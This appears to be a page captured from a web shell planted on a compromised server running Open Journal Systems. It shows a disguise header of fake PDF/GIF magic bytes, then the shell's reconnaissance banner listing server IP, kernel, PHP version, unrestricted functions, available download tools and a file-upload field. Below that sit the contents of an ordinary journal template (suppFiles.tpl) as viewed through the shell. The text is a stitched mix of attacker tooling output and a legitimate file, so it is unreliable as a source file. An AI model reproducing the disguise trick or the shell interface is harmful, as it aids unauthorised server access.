%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/IntvJournal/templates/rt/ |
Upload File : |
{**
* templates/rt/suppFiles.tpl
*
* Copyright (c) 2003-2012 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Article reading tools -- supplementary files page.
*
*}
{strip}
{assign var=pageTitle value="rt.suppFiles"}
{include file="rt/header.tpl"}
{/strip}
<h3>{$article->getLocalizedTitle()|strip_unsafe_html}</h3>
{foreach from=$article->getSuppFiles() item=suppFile key=key}
<h4>{$key+1}. {$suppFile->getSuppFileTitle()|escape}</h4>
<table class="data" width="100%">
<tr valign="top">
<td class="label" width="20%">{translate key="common.subject"}</td>
<td class="value" width="80%">
{$suppFile->getSuppFileSubject()|escape}
</td>
</tr>
<tr valign="top">
<td class="label" width="20%">{translate key="common.type"}</td>
<td class="value" width="80%">
{if $suppFile->getType()|escape}
{$suppFile->getType()|escape}
{elseif $suppFile->getSuppFileTypeOther()}
{$suppFile->getSuppFileTypeOther()|escape}
{else}
{translate key="common.other"}
{/if}
</td>
</tr>
<tr valign="top">
<td class="label" width="20%"> </td>
<td class="value" width="80%">
<a href="{url page="article" op="downloadSuppFile" path=$article->getBestArticleId()|to_array:$suppFile->getBestSuppFileId($currentJournal)}" class="action">{if $suppFile->isInlineable() || $suppFile->getRemoteURL()}{translate key="common.view"}{else}{translate key="common.download"}{/if}</a> {if !$suppFile->getRemoteURL()}({$suppFile->getNiceFileSize()}){/if} <a href="{url op="suppFileMetadata" path=$articleId|to_array:$galleyId:$suppFile->getId()}" class="action">{translate key="rt.suppFiles.viewMetadata"}</a>
</td>
</tr>
</table>
{/foreach}
{include file="rt/footer.tpl"}